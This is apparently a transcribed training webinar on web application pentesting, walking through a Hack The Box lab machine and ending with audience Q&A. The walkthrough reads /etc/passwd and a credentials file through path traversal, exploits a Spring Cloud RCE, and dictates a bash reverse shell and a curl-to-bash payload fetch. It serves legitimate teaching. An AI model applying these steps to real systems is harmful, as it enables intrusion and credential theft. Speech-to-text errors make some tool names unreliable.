Hello, everybody. Welcome to today's session. Today we have Mr. Ian, who is a cybersecurity expert from Kenya. He has been in the industry for a pretty long time and has a lot of experience in web application pen testing and other areas of cybersecurity. So, Mr. Ian, the floor is yours. And thank you very much for being in today's session.
Okay, good day, team. Thank you so much, Karim, for inviting me for the session. It actually means a lot, and it also shows that I have something that I can actually offer, some new joiners in the industry. So today, what we're going to be tackling is something that is going to be dealing with web application exploitation, which is one of the most fundamental parts of any person that wants to become either a pen tester or they want to become an application security engineer. So you need to understand exactly how web application works. You'll find that most of the applications right now, they're either mobile or web, and the reason as to that is because if you just deploy one application, like let me say like a web application, it can be accessed by millions of users. So you find that it's an easier way to write applications as compared to thick plans. That's why we feel like there's a necessity for any new joiner to understand exactly how this web application works, what happens under the hood, how they can be both enumerated and exploited. So for our case today, what we're going to be doing is, we're just going to be taking a box from Hack the Box, then try to enumerate it to see exactly where the vulnerability comes in, then probably also try to find a way on exactly how we can actually exploit it. So I'm going to be explaining a concept like, finding one-day vulnerabilities on application, how do path traversal and local file inclusion works, how do you perform enumeration on application, how do you fingerprint the exact language that is being run in the backend, how do you find the server that is running, those are the fundamental and the basic things that we're actually going to be looking at. And even lastly, we're going to be checking different tools to understand exactly what is the tool supposed to do and how is the tool supposed to work. Like, the basic tools like, Nikto that is supposed to be performing vulnerability scanning on an application is one of the most fundamental tools. I know it's such an underrated tool, but, of late I've come to identify that it's one of the, best tools to perform simple enumeration on any web application. So the IP address of the web application that we're going to be attacking is 10.10.11.204. So first of all, what you're supposed to do is to perform just a ping scan. Basically, a ping scan is just to see if the host is alive or, can you be able to actually talk to the machine. So if a ping is successful, you're going to get both an echo reply saying that, this box is alive, you can actually enumerate it. So to do a ping, basically just run a ping, then you specify the IP address of that specific box is 10.10.11.204. And if you get this feedback, it tells you that the box is alive because you sent 3 packets, then 3 packets were received. So you send a packet to the box itself, then it replies back to you telling you that the host is alive. Then from this information, you can also see that we get a TTL for the box. Basically, ping is one of the tools that can be used to fingerprint the exact OS that is running on that specific web application. So what happens is the way you're going to be exploiting Linux and Windows in web application, it might differ, not that much, but there are some slight things that you need to understand. Like, for the default web directory for Linux box, it's going to be a bit different as compared to Windows box. The file extension and the languages used to write any web application for both Windows and Linux, they might differ, not always, because there are some applications like I can say XAMPP that can mimic PHP on Windows boxes, but most of the time you'll find that for an ISP Microsoft web application, they'll be written in .NET framework. So basically, you need to understand those basic things before you even begin exploiting a box. So the moment you find that a box is alive, the next thing you can actually do is to run an nmap scan of the box, and you're going to be using the command nmap, which is the binary to map ports that are open in that specific system, then provide an SC to tell you that I need you to run save scripts. Then after that, you provide an SV to tell you that I need you to perform version enumeration. Then after that, provide the IP address of the books you're trying to attack. So basically, this is just going to be running an nmap scan for the top 1,000 ports. But basically, any system has 65,535 ports. That's for both UDP and TCP. So basically, you can actually run full ports by including a dash option. But for our case, for this specific box that I'm trying to enumerate, whatever we need, it's just in the top 1,000 port. So I've already run this scan before. So let's just look at the results. So it's going to be in this file. So let's just look at it. So as you can see, we have 2 ports that are open. One of them is SSH on port 22. So basically, this is just situation. So if you have valid credentials for a system, you can actually use it to access the system. Then the second one is port 8, and it's telling us that it's running something known as Nagios NCSA. So we can just open it up to see exactly what this is. So let me just open it up on Mozilla Firefox, then we can just look at it. So, Karim, on your end, I hope you can just tell me if the font is too small so that I can increase it, because using a monitor that can make font appear to be a bit small.
Yeah, definitely. The fonts are okay, so you can just proceed. It's fine.
Okay, if anything is too small, you can just cut me midway, then I can just adjust the fonts. But let's just try to access the port. It says that the server is refusing connection. Reasons to that we'll come to find later, but for the time being, let's just run it as is to see exactly what you're going to get. So let's just give it some time and it's going to load. So here it is. Let me just increase the fonts a bit because I'm not sure if it was okay. But as you can see, we get probably a website called Zod Cloud, and it says it allows you to store, share, and collaborate on files and folders from your mobile device, tablet, or even computer. And it says that it has the ability for somebody to perform registration and even login. But if I click login, if you see at my left bottom corner, you'll see that the link actually goes nowhere. Then the sign up link goes to register. Then it says that this side has different features, like you can be able, there's built-in encryption to ensure that your data is protected. There's faster data transfers. Then they also give some plan that you can actually subscribe to. So this is just the basic functionality of the web application. So the first thing that you can find somebody usually does is just click Control U to see exactly the source code of the page. I've been performing engagements and I can tell you for sure, developers leave comments on web applications. You can find that a developer is, doing work so fast that they forget that they included a password because they didn't want to refer to the same, to type the same password each and every time. And they left that an application was, taken to production. It's something that happens. And, for a real scenario, there was a time like, let me say 2 years back, I was performing an assessment on an application that was supposed to be sending users OTP. So basically what happens is, for the person that was creating the application, they decided to, instead of receiving an OTP every time they want to log in the application, they just leave a comment that generates an OTP, then place it in one of the comments. So if you just look at the comments, you could bypass the entire OTP feature of that application. So that's why it's always necessary for somebody to look at the source to see, did the developer, leave anything behind, that can actually help in compromising the application. So basically, that's one thing you can do. The next thing we can also see is, are there any links that are looking? As you can see right now here, we have a link to /blogs, we have a link to /uploads. Maybe it's something that you can actually look at to see if, any of these endpoints are actually vulnerable. There's also, I think there's a link for registration. If you just look at it carefully, here it is. There's also a link for registration. But, these are just the basic checks that you're supposed to do. The next thing you're supposed to do is to check for robots.txt. So basically, robots.txt just tells a web crawler that the moment you find this part, you're actually not supposed to crawl. But this also gives a leeway for attackers to find these hidden endpoints that they might actually try to exploit if they can identify, any vulnerabilities in them. So to check for robots.txt, you just type robots.txt, then it's going to take you to that endpoint if at all it exists. But as you can see, we get a 404 error, meaning it doesn't exist. So those are some of the checks that we can actually do. But before we start enumerating the application, what we can actually do is just take the URL, then perform simple enumeration, like running a directory brute forcing to see if there are any hidden directories that might have any juicy information, or even that might have any vulnerabilities that we can actually exploit. So to run GoBuster, you use the command GoBuster. Then specify what you want to do. For my case, it's directory brute forcing, because GoBuster, can perform subdomain enumeration, name servers enumeration. So it can perform vhost enumeration. So basically, you need to specify the mode, that you want to, like in my case, it's just directory brute forcing. That's why I'm specifying dir. Then you specify -u for the URL. Then you specify -w for the word list. So I'm going to be going to desktop, git setlist. Then I'm going to be specifying discovery, web content, then draft, small words.txt. Then after that, you specify -x to check for extensions, like, if you want every word on that specific list to be in an extension. So like in my case, I'm going to be putting PHP, HTML, then TXT. Those are just the basic extensions that I normally include. Then after that, I include threads, tell it that I want for every request that it sends to the backend, it needs to be 30 threads. But for any production environment, if you try to run 30 threads at every second or every time these binary is sending a package to the server, you might actually get blocked by a web application firewall. So basically, it's something that you need to check to ensure that the application doesn't have a web application firewall, because if it hasn't recognized that you're actually sending 30 requests for every second you're trying to send a request to the server, may think that you are bot, then block your IP address. But in our case, this is just, let me say a CTF site. That's why we're actually not, we're actually sending 30 threads per second. But as you can see, it has been able to identify a couple of endpoints. So the next thing that we can actually run is a Nicto scan. So basically, as I said before, a Nicto scan is supposed to just perform basic vulnerability scanning on the application. So to run it, what you need to specify is Nicto, then specify a -h, then specify the URL. So there it is. Then after that, it's just going to be checking to see if there are any vulnerabilities that you can actually exploit on this server. So just an FYI, Nicto sometimes provide false positives. But I've seen in most of the cases there are some tiny things like shell shock, whereby Nicto is able to find, but it's something that normally as an attacker, it's hard to test those bugs because it's a bug from 2015. But basically, Nicto performs all those things. So that's why it becomes a really essential tool whenever you're trying to perform any application pen testing. So if I go back to GoBuster, there was an endpoint for /register. So let's see if you can actually register for an account. Just give me a second. Register. It says that the site is under construction. So basically, you can't perform any registration on the site, which is okay. There was also an endpoint to perform an upload. So let's check and see if the endpoint is actually working. So there's a /upload. Let's just give it a second, and it says that you can actually upload some files. So what I can do is let me just click browse, then go to boxes, then box write-ups, then hack the box, then let me go to inject, then let me try to upload. Just an image. I click upload, and it says that the file was uploaded successfully. You can actually view it. Let me go to that file and we just see that file. So basically, it just allows us to perform file upload. Remember, this is what was said in the home page, whereby it allows people to be able to upload files on that specific system. But the next thing is, if this site was running something like PHP, if you're able to upload something like a shell.php, just a web shell, you can actually get remote code execution on that application. So those are the things that you need to check out for whenever you're trying to check for file uploads. Another thing is you can check for cross-site scripting. You can check for things like SQL injection in the file parameters. You can check for path reversal. So basically what happens is there's a dedicated directory that you can actually upload files. So if you can upload to other directories other than what is specified, you've actually been able to identify something known as a path traversal or directory traversal on that specific web application. It can be bad because, let me give an example of web applications that are running something like Flask. So that is Python. If the server is in debug mode, you're able to upload files, and you upload files to something like main.php, the application, if it notices that the source code has changed, it does a refresh. So basically, you can even get a remote code execution. It's something that, it's a bit hard to explain without you seeing, but it's something, it's possible you meet if an application is in debug mode for Flask applications. But in our case, what we see is, the moment you upload an image, there is this endpoint called show image. It takes a parameter called img, then you specify the file name. So basically, you can just specify a file name and retrieve it from the web server. So the next thing I tried to do was to see, can I be able to retrieve any other file other than whatever has been specified? So like, if I put dot slash, then put dot slash, so a bit, some dot slashes, then slash etc, then pass wd to see if it's going to work. So we just get an internal server error, and just to confirm this, what I decided to do was, let me just use a program called Backsuit. Basically, Backsuit allows, acts as a proxy. So before this traffic hits the wire, I'm able to intercept it, then edit to my liking, then submit it to the backend server. So basically, it's one of the most essential tools that you need to understand how it works whenever you're performing, web application pen test. So let me just open it up. Just give me a second. Let me just increase the font, then type Backsuit to open the application. It's written in Java for most of the cases. So just give me a second. So there it is. Let me just open it up. Then let's try to look at the request again and see if it's going to work. So just give me a second. Here it is. So let me just intercept this request that I was sending previously and just look at it. There it is. Let me send it to repeater. And maybe you can just confirm if the font is so small, so that it can actually increase. Okay. Let me just increase it a bit. Maybe 20 will appear better. Yes, I think that's a bit better, but let me just increase it again to like 24, 28. I think 28 is better. Yes, that looks a bit better. So let me just send the request again and see exactly what you're going to get. So we still get a 500 server error. So let me try to include some additional dot slashes. So dot slash, sorry about that. Dot slash, dot slash, dot slash. So let me see if I add some dot slash, if it's going to work. Still, I'm getting a 500 server error. Let me try to access content in slash, see if it's going to work. So I'm still getting a 500 server error. Okay. Then let me do this. Then again, try slash etc slash pass wd. And now it works. So basically what this means is we are able to extract contents, that are outside the web directory. So when this happens, you find that it leads to something known as a sensitive information disclosure. So basically the way the app was written, or what the developer intended for this specific application, was that I shouldn't be able to extract information from I shouldn't be able to extract information that is outside the web directory, but actually this is not the case. So I'm actually able to do it, and this leads to sensitive information disclosure, because right now, as you can see, I'm able to identify that this specific server has a user called Phil, it has a user called Frank, and it even has a user called root. Remember, initially when we were trying to do the scans, we found that cat/etc nmap inject.nmap, there was this protocol called SSH. So right now, what I can actually do is to try to perform a brute force, because I have valid usernames, and to see if any of these users have something known as a weak password, or if the server itself has a weak password policy that I can actually exploit to get a shell on the system. But that is something that you can actually do. But that is not the case. So the next thing that I tried to do was to see, other than being able to exfiltrate files, can I be able to do the same for directories? So what I did was I just tried to access Flash, and as you can see, it works. So this is a behavior that is actually only seen in let me say Java application. So for something like PHP, ASP, I haven't seen this actually happening. But for Java, it has the ability for someone to even be able to extract directories rather than only lines. So the first thing I decided to check was to see if I can find any SSH key for the user. So if I go to /home, remember we have two users called Phil and Frank. So if I go to /home, you can see that we have those two users. So if I go to Frank, let me see if he has anything interesting in his home directory. So we have 4 files: bash history, we have bash rc, we have .cache, which is a directory, .local, which is a directory, m2, which is a directory, then we have a .profiles, which is a file. So given the fact that I've already done this box before, I'll tell you that the only thing that is interesting is in the m2 directory. So .m2, let us just try to access it to see exactly what we are going to get. We get there is a file called settings.xml. So let's just try to access this, settings.xml. So here it is. We get an XML file, and the most interesting thing, we see that it has credentials. So it has the credentials for the user field. So let's just copy it, then go back to our terminal, then just save it in a file called creds.txt. Yeah, there it is. Let me just format it a bit. Then the next thing that I tried to do, remember we had SSH. So what I tried to do was to see, does these credentials work for SSH? So let me just copy it. Then let's try to log in via SSH. So SSH fill at 10.10.11.204. Then put the password and see if it's going to work. So basically it doesn't work. So that appears to be a dead end. So we have a password, but basically it doesn't allow us to log in via SSH. So the next that I tried to do was to see, is there any other interesting information that I can actually get from the system? So the first that I checked was, can I be able to just access the web root of this specific system? So to do that, what you can do is to go to var/www and see exactly, the folder that the application is sorted in. So there's /html, then web app. So basically, our web application is hosted in a web app directory. So let's just try to access it, and we get some files. And probably from just looking at mvnw.cmd and mvnw, it makes us believe that probably our application was written in Maven. So that's Java. But for our specific case, we want to look at pom.xml. So basically, pom.xml gives you the exact packages and their versions that were used, whenever the developer was actually creating the web application. Like, you can actually get that the Spring Boot version is 2.65. If you look at something like, let me see, they use that dependency called com.sun.activation. It's version 1.2.0. And but the most interesting thing in our case was this specific dependency. If you look at this specific dependency, it's org.spring-framework.cloud. It's version 3.2.2. So the first that I did was I took this, I just looked at the entire dependencies, but this one, I found that it had a specific vulnerability. So let me just copy it. Then let's go to the web, to Mozilla, then just try to Google to see if it has any specific vulnerabilities that you can actually identify. So let me just copy it, go back to Mozilla, then turn off intercept, then try to see if it has any vulnerabilities that you can actually access. So let me just come here, write it, then version 3.2.2, then type exploit. So there it is. Let me see if it's going to work, on the box. So as you can see, we get that it has some specific vulnerabilities. Let me just look at this specific log. it says that detecting and mitigating CVE 2022-22963, which is a Spring Cloud RCE vulnerability. So basically, it just explains the vulnerability. But the good thing is it even gives us how to exploit it. So basically, it gives us the following template. So let me just try to increase the font because I'm noticing right now that it might actually not be visible. So here it is. But this is the POC that I'm actually explaining. So let's just copy it. Then from there, what we can do, let me open up a notepad. Then what I can actually do is just try to edit the exploit to actually fit exactly what I want to do. So here it is. Then I just need to change the host. In our case, it's supposed to be 10.10.11.204. Then put 80. I think that's correct. So let me see. I also need to change the IP address here. So it's supposed to be 10.10.11.202. Then what the exploit does, it just tries to touch temp test.txt. So basically, we can confirm if it worked. So let me just copy the exploit, go back to my Linux box, then just try to run it and see if it's going to work. So let's just give it a second and hope it works. So let's just give it a second and if it's going to work. I've seen there's something wrong. It's not supposed to be 202, but it's supposed to be 204. So sorry about that. We get an error saying that internal server error, type conversion problem, cannot convert java.lang.process something. So basically it didn't work. No, I am saying it didn't work on the front end, but to confirm it, remember we have a path reversal vulnerability. So what we can do is try to go to /temp to see if that file was actually written. So let us just go to temp directory, so /tmp. Then what you can do is click send and see what we get. We get that there's a test that was written. So, probably it might have worked or not, but to confirm it, let me just try to use something like exploit dot something, let me say like worked, something like this, and send it to the server again and see if it's going to work. So we are going to get the same error, but if I go back to /temp, we see it actually wrote it. So it means our exploit works. So that version of Spring.cloud actually is vulnerable to remote code execution. So now we need to exploit it. And there are different ways that you can actually do it, and I hope it works. But just an FYI, what if we couldn't actually see the output, because someone might see this error and thought that the exploit didn't work. So what are the other ways? Probably something like an out-of-band attack that you can actually use to confirm if the exploit works. So the best thing you can actually do is to use something like a ping. So to try to perform ping, what I'm going to do is, let me split my screen into two. Then leave the exploit at the top right corner. Then try to use something like TCP dump. So sudo TCP dump, then -i to specify the interface, which in my case is going to be -0. Then say that I just want to capture ICMP request. So basically an ICMP request is a ping. If I try to perform ping, then ping localhost, you can see the type of, okay, what I try to exploit is backfiring on me. But let me use something like 10.10.11.204. As you can see, it's performing an ICMP request. So we've been able to find a remote code execution. And as I was saying is, sometimes these types of exploits are blind, like let me say an out of band. So basically, you can't just type who am I or ID, then get a feedback on the same stream that you're actually sending an exploit. That's why you need to be a bit clever. Remember, remote code execution can be in two formats. It can either be, the one where everything is just seen in the same stream. So basically, then there is this one whereby it's a blind command injection, whereby even if you try, you can actually type commands, then the backend server will actually run those specific commands, but you actually won't be able to view the output of the same commands using the same stream. So that's why I'm saying that there is a necessity for you to understand exactly, if I don't receive a feedback, and if we didn't have this specific LFI in place, if there was another way that we could have actually confirmed if the exploit was working. So that is where ping comes in, and that's why we are going to be using TCP dump. So let me just type my password for TCP dump for Kali Linux, then start the TCP dump listener. So it says it's listening on turn 0. So basically we're good. Then after that, the next thing that I need to do, let me just go to the next string, the next pen, then get my IP address. So I'm just going to be ifconfig, then turn 0 to just get my IP address. Then go back to the SQL, not even SQL, but my exploit POC. Then try to perform a ping to see if I'm going to get a ping on my box. So let's just type ping, then -C1 for count, then type the IP address, then give it a second and hope it works. Ping -C1, 10, I don't know why I'm not receiving a feedback. So let me just stop that one. Maybe that's where the problem is. Okay. So the system appears to be hanging. I'm not exactly sure if somebody just decided to restart the box. Because it should be working. So probably somebody just decided to restart the box. Yeah, there it is. So let me try to run it again and see if exactly. So as you can see, we've been able to get an echo request and echo reply. Basically, ping worked. That's why I'm saying, if it's an out-of-band attack, like in our case, you can actually try to use something like ping to see if the exploit works. So right now, if I run the exploit again, you can see I'm still getting another echo request and reply. So basically this indicates that the exploit actually worked on our box. So the next thing that you can actually do is to try to get something known as a reverse shell. So basically a reverse shell is whereby we are getting a consistent shell that we can actually run the commands and even see both input and output. So to do that, let me just first of all, do the basics, like, set up a netcat listener, ncnvlp port 9001. Then after that, what we can actually do is just try to use something like a bash reverse shell. So, for this to happen, let me just copy the IP address of the box. Then try to type a bash-c, then single digs, then let me put it this way, bash-i greater than end, then /dev/tcp, then the IP address, then the port, which in my case it's 9001. Remember, use 9001 for netcat listener, then specify 0 greater than end 1, then close it, then close it. Yes, I think that looks okay. So let's try to run it. And we don't seem to be getting a reversal. And this is something you'll actually notice in many web, not even web, but Java-based web application. So basically what I realized before is that Java-based web applications are so finicky whenever it comes to, reversal. So they're really sensitive. If you just send some, like, as you look at a reversal, it contains many bad characters, like, forward slashes, angle brackets, and signs, dash signs. So basically, it most of the time breaks up the reversal. So, what I tried to do was to see if there was actually a way that I could upload a reversal, on the site, then try to, call the reversal basically from, some uploaded script that I've already uploaded for, on the site. So to do this, I'm just going to first of all, come back to my box. As you can see, Nikto scan ran successfully. It says that there's a directory called register, and it might be interesting. So it's something that you can actually try to check at it. But these are just basic information that Nikto gives you. I always say that it's better you run Nikto, then it fails to find something interesting, than just assume that Nikto won't find anything interesting and you miss a really specific a specific vulnerability that you could have actually identified if you use Nikto. But in our case, let's just try to set up a reversal. Like let me say vim musyoka.sh for the reversal. Then let's type bash-i, then greater than signed, then undersign, then /dev tcp. Then let me copy the IP address again, ifconfig turn 0. So here it is. So this is the IP address for my box, basically where the reversal is going to connect back to. Then specify port 9001, then 0 greater than end 1. So that appears to be okay. Don't worry about it. If you don't understand exactly what I'm doing, if you come back to Mozilla, then type pentest monkeys, monkeys reverse shell, you'll actually get it. So it might sound like, something that is so crazy, but I've written that specific payload so many times to the point that it has actually stick to my head. But what I'm actually just typing is this payload here. So what I'm typing is exactly this. Let me see if I can find it. Here it is. So you don't have to type it, but it's just something that I've typed so many times to the point that it has actually sticked in my head. But that is basically the reversal for bash. So let me just save it. Remember, we've saved it in a file called musyoka.sh. Then the next thing that I'm going to be doing is really simple, setting up an HTTP server using Python so that I can actually download the exploit on the box. So let me get my IP address one last time. I'm sorry, but, it's really hard remembering my IP address, but it's something that, I can actually get from, just a basic command. That's why you decide not. I haven't crammed it. So let's just go back to our function. Then what you're going to do next is to perform a curl. Basically, just curl the exploit, then see if it's going to work. So let me just do this time a curl, then provide the IP address, the port that my web server is running on. It's port 8000, as you can see from the above string. Then put musyoka.sh because that's the exact file that we want to get. Then what I can actually try to do is to say pipe it to bash to see if it's going to work. So let's run it. As you can see, we didn't get a reverse shell. But if I go back to my HTTP list, and you can see that it was able to get the exploit because we get a 200 okay. So basically, this works as expected, but we didn't get the reverse shell. The next thing that I tried to do was to see, can I be able to save this exploit to something like /temp, then try to execute it to see if it's going to work. So to save something, using curly, just use -o command, then /tmp, then something like musyoka.sh. So there it is. Let's try to download the exploit script to /temp. So let's just give it a second. I think somebody's just messing up with the box because I keep getting some timeouts on my end. But let me try it again and see if it's going to work. But it's really crazy getting these. Somebody resetting the box after every few minutes. So let's just wait and hope it comes back.
Well, sorry, Mr. Ian, if it doesn't
Yes.
Work, then I guess we can just end here. I guess the next step would be just getting access to the box and then to get the user flag, right?
Exactly.
Yeah, so we can just end here and then probably, do some Q&A and also check out any tools that you mentioned previously that you would demonstrate, then that would be a great thing.
Exactly, that's okay.
Okay.
Let's start talking about, tools. Basically, what other tools can you actually use for pen testing, web applications? So the best thing is, remember, I didn't explain previously, but I'm using an operating system called Kali Linux, which is basically a modified operating system, or a operating system that was built specifically for pen testers and security researchers. So one of the best thing is, if I go to my top right corner and click on it, we can see that there is a section, for web analysis, whereby you can actually get some various tools. Like I said, Babsuit, which is one of the tools that you're going to be using. Let me say, like, whenever you're performing a web app pen test, you're going to be using Babsuit 80 to 90% of your time. After that, you can see that there are tools like Comics that test for something known as command injection. There's Keepfish, which is just another vulnerability scanner. So there are a lot of tools that you can actually use to test for, vulnerabilities on applications. Even Babsuit itself, if you're using the commercial version, you can see that there is an option that allows me to perform something known as a scan. So if I click on, I think it's, let me see if I can actually find it, do an active scan. If I click on do active scan, and if I go to target, you can actually see that it will be performing some active scans on the target. I think if I go to dashboard, yes, it says that it's performing an active scan. So here it is. So basically, even Babsuit is one of the tools that can actually perform scans. But as you can see, there are tools for web vulnerability scanners. There are tools that you can use perform crawling and directory brute forcing. My best tool, as of now, is GoBuster, but there are tools like FAF, there are tools like WFAS. There are tools that can be used to proxy traffic, like Babsuit. As I said before, Babsuit is just a tool to proxy traffic, and it's like a man in the middle that starts between you and the backend server. So it captures traffic before it reaches the backend server, then it captures traffic before it reaches the front end. So basically, you can actually do manipulation. So there's another tool called WP scan, but it is actually only used for performing security audits on WordPress application. Those are just some of the various tools that you can actually use. Also, if I go back and pick the IP address, I think another tool that just performs basic fingerprinting is called WhatWeb. I hope I'm correct by the spelling. Yeah, here it is, WhatWeb. So I'm required to provide the URL. So here it is. Then if I click run, let's just give it a second and see if it's going to find anything interesting. I'm just getting a bit of time out, so I just hope it works. But
Sorry,
as you saw,
we can't see your
I
screen.
keep, okay. Sorry about that. Karim, I wish you could have told me that before, because there's a lot I've explained, but what I was saying is, if you go to the top right corner for Kali Linux, and you go to something like web analysis, you'll notice that there are various tools. So it's something that you can actually interact with. This is not a comprehensive list, because there are tools like Wapiti, Nikto, DAVTest to perform security audits on DAVTest, is it WebDAV servers. Cadaver is another tool for performing security audits on the same type of framework. There's tools like WhatWeb, like something that I was trying to show you, but the URL appears to be a bit unstable. SQL map, it's one of the fundamental tools to performing SQL injections. So it's one of the vulnerabilities that allows you to exploit and dump information from the database. But basically, there are various tools. The good thing about security industry is that people, each and every day create tools, then they open source them. So basically, you can just use the tools, then use them to perform this specific type of enumeration. But as I was saying that something like WhatWeb, you can actually use it to perform fingerprinting to see exactly what kind of language is this server running on, what kind of server is it using. But basically, yeah, like I've gotten lucky. It says that it's using Bootstrap. It shows me the country, the IP address, the title, and but basically this is just basic information of fingerprinting that you can actually identify from this side. So understanding exactly how this tool works allows you to perform security audits. Like in our case, You can see I was running a security audit using Babster, and it told me that, this specific application is vulnerable to something known as a path traversal. We already identified this on our own, but if you are somebody that, if you couldn't be able to identify that on your own, Babster could have been enable you to find the exact, vulnerability that, this system had. But we are able to do that on our own. So to be able to do a security audit using Babsuit, if you have the commercial version, you just click on the request, then click on do active scan. Then the application is actually going to, Babsuit is going to do a security audit on the application itself. So I actually recommend, if you have a commercial version, commercial license for this specific application. If not, you can use free version of software like Dictoscan, as I've actually mentioned before. Yeah, I believe that helps you. It's just a startup for people that are doing security audits. But as you continue growing, you'll find that there are tools that I even not mentioned in Kali Linux, but you'll be able to find them in the in GitHub repositories, and you can even be able to use them. Some of these tools I've actually written myself. As I usually tell security practitioners, that it reaches a point whereby you'll see there is need for you to learn writing exploits on your own, because some of these boxes, or some of these vulnerabilities, you find that they're either time sensitive. So basically, it's either you type your request first or find a way of automating the exploit part itself. So it's something that I feel like through your journey as a cybersecurity, either consultant, analyst, pen tester, engineer, you'll have to learn it one way or another. But yeah, those are just some of the tools that I use, but not all. Depending on various scenarios, I'll find that there are tools that I haven't mentioned, but I'll actually use them whenever I'll be performing security audits.
Wonderful. Thank you very much. I think now we can go to the Q&A. There are some questions that I've received from the guys. Then I guess you'll be in the position to answer them. So the first one is,
Sure.
how long does it take to perfect your skills?
So what happens is, I'll just tell you this for sure, that I'm still, even for my case, it's a work in progress. Nobody's perfect.
Yeah.
You'll find that there's the for cybersecurity, there is always room for improvement, because what I usually say is that in each and every day, new exploits, new vulnerabilities, new techniques come out. So if you decide to say that I've reached the end of a learning curve, you'll find that in the next 2 years, whatever information you have will actually become invalid. That's why there is always constant need for somebody to always learn. So I can say that right now I've just even scratched the surface myself. I still have a long way to go.
Yes.
And I believe it takes dedication and commitment for you to be able to be one of these big guys in cybersecurity. So I can't say that you've actually perfected the art, because, as I've said, things keep on changing in cybersecurity. Tools
Yeah.
keep on changing, operating system keeps on changing, techniques keep on changing. So it's just a matter of refining yourself each and every day, expecting that you'll be one of the best out there.
Yeah, very true.
Yeah.
The other question is, why is it important to check robots.txt?
So what happens is, as explained before, robots.txt, it's just something that tells web crawlers, like some robots that you shouldn't be able, don't crawl this specific endpoint, because maybe it contains sensitive information. So basically, what happens is, they leave that there for these automated bots to ensure that they just stick to that, whereby if they find it, they won't be able to crawl those sites. But it also gives a leeway for attackers, because if an attacker finds a robots.txt, they'll find any sensitive endpoints that are in that robots.txt and even be able to access them. And you find that most of these endpoints, they can be exploitable. Like you can find, like, there's a point, let me say, an endpoint for performing password resets, forgot passwords, endpoints for registration, endpoints for login, because those are the juicy endpoints. So
Yeah.
those are the endpoints that you find most of the time in robots.txt, and they can actually help you to exploit the site if they are there. So I don't recommend it. If a bot doesn't know the exact path, it won't even be able to crawl it. So I feel like having it there, it's a necessary risk that you have, having in the web application.
Yeah. Very true.
Yeah.
The other question is in relation to Burp Suite. They are asking, what about Zap?
So Zap is a really nice tool. I haven't used it a lot. As you know, people say that to each there's a quote that says that to each his own. Basically, you can find that when I was starting cybersecurity, I was introduced to Babsuit rather than Zap. So it's
Mm,
something that I actually went with it. But I
yeah,
have friends in cybersecurity that prefer Zap even to Babsuit. So it's just another proxy tool like Babsuit that you
mm,
can actually do the same exact thing. The good thing about Zap is it's open source. Basically, the good thing about open source application is it can, as I've said before, you can't perform a scan. Using the community version of Babsuit, but you can actually do that with Zap. So that's one of the main advantages of Zap as compared to Babsuit. But it just performs the same exact function uh, as Babsuit itself.
yeah,
So it's
true.
just a different framework, probably the same or different language. I can't,
Yeah,
I am not exactly too sure about that, but the functionalities are almost similar, if not the same.
perfect. The other question is, what about certification? What certification is needed in order to, if there is any, to get into web app pen testing?
So, you know, if there was time I could have given my story, like how I started in cybersecurity. So what happened is I got into cybersecurity in 2019. No certification, and funny enough, for my undergraduate studies, I did something to do with chemistry, not even computer science or informatics or computer engineering or software engineering or development, something like that. So I
Yeah,
did something that is outside this field, but what even by the time I got my first job, I didn't even have any certification as of yet, but I had the content and knowledge. If somebody, when I was being interviewed, somebody could see that this person exactly knows what he's talking about. So let me say right now is there are really amazing certifications in cybersecurity, but if you're a beginner, I wouldn't really recommend you to get certifications. Rather, I'd encourage you to learn as much as you can. I feel like learning is more important than getting a certification, because in learning, you cover a larger scope than in just what is being offered in a certification. But there are certifications that are really good right now in cybersecurity. Like I've seen people doing CEH. I know organizations look at CEH. There are some
yeah,
organizations that really fancy CEH, but personally, to me, not that much. It's a good certificate, but for my case, I don't think like right now in this specific time period that I'd actually take a CEH. But there are certifications like OICP. OICP teaches you everything from the basic to the more intermediate stuff, which I feel like it's a really good fit for anybody that is transitioning to cybersecurity. So if you
yeah,
can actually get that certificate, it will actually help you learn a lot, find how systems are exploited, how web applications are exploited, how you
yeah,
can perform pivoting, how you can perform privilege escalations, how you can exploit domain controllers, how you can write custom scripts, how you can use command and control servers. It teaches you everything that you need to start a cybersecurity career. So OECP is one of the certifications that I do recommend a lot. If you can pass the exam, it really gives you a huge advantage, because you can actually even apply for jobs in abroad, because it's a
yeah,
certificate that is being known worldwide as we speak. So
yeah,
OECP is
very
one of
true.
the best certificates. OSWE is one of the best certificates you can get out there. There is one for EJPT. I also recommend it. I think those are just some of the few certificates that I can actually recommend right now. But they are
Yeah,
really expensive. That's why I'm saying for a beginner, I don't feel like there is that much necessity for you to be focusing on certifications, but
yeah.
focus, and tune your mind on learning more than certifications.
Wow. Okay.
Yeah.
That's very insightful, I must say. So the last question is, what is the best approach, manual testing or using of tools and automation when it comes to web app pen testing?
So I think I'll say both. I think I'll say both, because remember I told you before, you can't test for every vulnerability that is out there. So you'll notice that there are a lot, like, there are heartbeat vulnerabilities, there are shell shock vulnerabilities. And remember, the vulnerabilities that I'm actually talking about are from 2018, 2015. So you find that sometimes you won't even have enough time to test everything. That's why I think you need to follow both approaches, whereby, while you're testing an application, first of all, run a scanner. Just, automated testing, whereby it runs a scan. As I usually say, it's better you run a scanner, it fails to find something, than you fail to run a scanner and it can identify it's something critical that that application is actually having. So, it's a good idea to run both of them and, just compare the results and try to see, did it find anything that I could have missed while I'm performing manual testing? It's just a
Yeah.
good idea to run both. So I don't favor one over the other, but I'd recommend that if you're trying to perform any web app exploitations, run both. It's
Yeah.
just good to run both, see what happens. You might be lucky, you might not be lucky. But most of the times, what I usually say is these automated tools, they follow a certain script. It's like, it's a movie whereby there's lines. So
Yeah.
basically, just test the lines, see the output. Does it correspond to what I know? If it corresponds, it tells you it's vulnerable.
Yeah.
But for manual testing, you send an input to an application, wait to see its feedback. Does
Yeah.
it tell me it's vulnerable? So depending on the feedback, I can determine by myself as a human if it's vulnerable or not. That's why it's one of the most important aspects of testing. So manual, it's
Perfect.
better you fail to perform automated testing, but perform manual testing. Because manual, that human aspect of testing, it actually eliminates these critical bugs. As you can find in
Yeah.
HackerOne, if let me just take a bug bounty program. These organizations, I'm sure they've run automated tools like 1,000 times, but you can find that still a bug hunter comes and finds something critical that was missed. Why? Because automated tools run based on a script or an input.
Yeah.
So that's where I can say the limitation comes in, and that's why there is need for someone to be able to run an automated scan.
Yeah.
So no, not automated, but manual scan. So it's like
Yeah.
doing that manual exploitation yourself, gives you that confidence that, what I've done, it's, or
The
whatever
correct
I've created
thing.
is actually, bug proof, and it can't actually be exploited.
Yes. Well, thank
Yeah.
